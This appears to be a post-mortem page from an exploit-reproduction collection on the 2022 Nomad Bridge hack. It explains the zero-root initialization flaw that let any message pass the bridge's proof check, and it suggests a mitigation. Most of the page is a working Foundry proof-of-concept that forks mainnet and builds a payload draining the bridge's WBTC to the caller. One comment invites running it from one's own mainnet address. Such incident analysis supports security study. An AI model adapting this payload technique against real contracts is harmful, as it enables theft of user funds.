Nomad Bridge

Total Losses

$190.0M+

Date

August 1, 2022

Network

ethereum

moonbean

Step-by-step

Call process with an arbitrary message to the bridge.

Detailed Description

The root of the problem lies in the initialize method. In the bad initialization tx the _commitedRoot was sent as 0x00. This causes the confirmAt[0x00] value to be 1.

    function initialize(uint32 _remoteDomain, address _updater, bytes32 _committedRoot, uint256 _optimisticSeconds) public initializer {
        __NomadBase_initialize(_updater);
        // set storage variables
        entered = 1;
        remoteDomain = _remoteDomain;
        committedRoot = _committedRoot;
        // pre-approve the committed root.
        confirmAt[_committedRoot] = 1;
        _setOptimisticTimeout(_optimisticSeconds);
    }

So far, there are no obvious issues. The problem is apparent when you check the process and acceptableRoot methods: sending an arbitrary message results in a call to acceptableRoot(messages[_messageHash]). If the message is not in the messages map (ie: it has not been processed before), this triggers a call with to acceptableRoot(0x00).

Because the update set confirmAt[0x00] at 1, this will end up giving true for all messages! So anyone can send any message to process and get it approved by the contract.

    function process(bytes memory _message) public returns (bool _success) {
        // ensure message was meant for this domain
        bytes29 _m = _message.ref(0);
        require(_m.destination() == localDomain, "!destination");
        // ensure message has been proven
        bytes32 _messageHash = _m.keccak();
        require(acceptableRoot(messages[_messageHash]), "!proven");
        // check re-entrancy guard
        require(entered == 1, "!reentrant");
        entered = 0;
        // update message status as processed
        messages[_messageHash] = LEGACY_STATUS_PROCESSED;
        // call handle function
        IMessageRecipient(_m.recipientAddress()).handle(
            _m.origin(),
            _m.nonce(),
            _m.sender(),
            _m.body().clone()
        );
        // emit process results
        emit Process(_messageHash, true, "");
        // reset re-entrancy guard
        entered = 1;
        // return true
        return true;
    }

    function acceptableRoot(bytes32 _root) public view returns (bool) {
        // this is backwards-compatibility for messages proven/processed
        // under previous versions
        if (_root == LEGACY_STATUS_PROVEN) return true;
        if (_root == LEGACY_STATUS_PROCESSED) return false;

        uint256 _time = confirmAt[_root];
        if (_time == 0) {
            return false;
        }
        return block.timestamp >= _time;
    }

Possible mitigations

Make sure that initializers uphold invariants. In this case, a require(_committedRoot != 0) would have prevented the attack.

NomadBridge.attack.sol

solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "forge-std/Test.sol";
import {TestHarness} from "../../TestHarness.sol";
import {IERC20} from "../../interfaces/IERC20.sol";

import {TokenBalanceTracker} from "../../modules/TokenBalanceTracker.sol";

interface INomadReplica {
    function initialize(
        uint32 _remoteDomain,
        address _updater,
        bytes32 _committedRoot,
        uint256 _optimisticSeconds
    ) external;
    function process(bytes memory _message) external returns (bool _success);
    function acceptableRoot(bytes32 _root) external view returns (bool);
}

contract Exploit_Nomad is TestHarness, TokenBalanceTracker {
    address internal constant NOMAD_DEPLOYER = 0xA5bD5c661f373256c0cCfbc628Fd52DE74f9BB55;
    address internal constant attacker = address(0xa8C83B1b30291A3a1a118058b5445cC83041Cd9d);

    uint32 internal constant ETHEREUM = 0x657468; // "eth"
    uint32 internal constant MOONBEAM = 0x6265616d; // "beam"

    INomadReplica internal constant replicaProxy = INomadReplica(0x5D94309E5a0090b165FA4181519701637B6DAEBA);
    INomadReplica internal constant replica = INomadReplica(0xB92336759618F55bd0F8313bd843604592E27bd8);

    address internal constant bridgeRouter = 0xD3dfD3eDe74E0DCEBC1AA685e151332857efCe2d;
    address internal constant ercBridge = 0x88A69B4E698A4B090DF6CF5Bd7B2D47325Ad30A3;

    IERC20 constant WBTC = IERC20(0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599);

    function setUp() external {
        cheat.createSelectFork(vm.envString("RPC_URL"), 15_259_100); // We pin one block before the attacker
            // starts to drain the bridge after he sent the 0.1 WBTC tx on Moonbeam.
        cheat.label(NOMAD_DEPLOYER, "Nomad Deployer");

        addTokenToTracker(address(WBTC));

        console.log("\nInitial balances:");
        updateBalanceTracker(ercBridge);
        updateBalanceTracker(address(this));
    }

    function test_attack() external {
        uint256 balanceAttackerBefore = WBTC.balanceOf(address(this));

        logBalancesWithLabel("Bridge", ercBridge);
        logBalancesWithLabel("Attacker", address(this));

        // Try changing address(this) for your address in mainnet ;)
        bytes memory payload = getPayload(address(this), address(WBTC), WBTC.balanceOf(ercBridge));

        emit log_named_bytes("Tx Payload", payload);

        bool success = replicaProxy.process(payload);
        require(success, "Process failed");

        console.log("Final balances:");
        logBalancesWithLabel("Bridge", ercBridge);
        logBalancesWithLabel("Attacker", address(this));

        uint256 balanceAttackerAfter = WBTC.balanceOf(address(this));
        assertGe(balanceAttackerAfter, balanceAttackerBefore);
    }

    function getPayload(address recipient, address token, uint256 amount)
        public
        pure
        returns (bytes memory)
    {
        bytes memory payload = abi.encodePacked(
            MOONBEAM, // Home chain domain
            uint256(uint160(bridgeRouter)), // Sender: bridge
            uint32(0), // Dst nonce
            ETHEREUM, // Dst chain domain
            uint256(uint160(ercBridge)), // Recipient (Nomad ERC20 bridge)
            ETHEREUM, // Token domain
            uint256(uint160(token)), // token id (e.g. WBTC)
            uint8(0x3), // Type - transfer
            uint256(uint160(recipient)), // Recipient of the transfer
            uint256(amount), // Amount (e.g. 10000000000)
            uint256(0) // Optional: Token details hash
                // keccak256(
                //     abi.encodePacked(
                //         bytes(tokenName).length,
                //         tokenName,
                //         bytes(tokenSymbol).length,
                //         tokenSymbol,
                //         tokenDecimals
                //     )
                // )
        );

        return payload;
    }
}

Reproduction Command

                
                  forge test --match-contract Exploit_Nomad -vvv

Step-by-step

Detailed Description

Possible mitigations

File Icon NomadBridge.attack.sol

Code Icon Reproduction Command

NomadBridge.attack.sol

Reproduction Command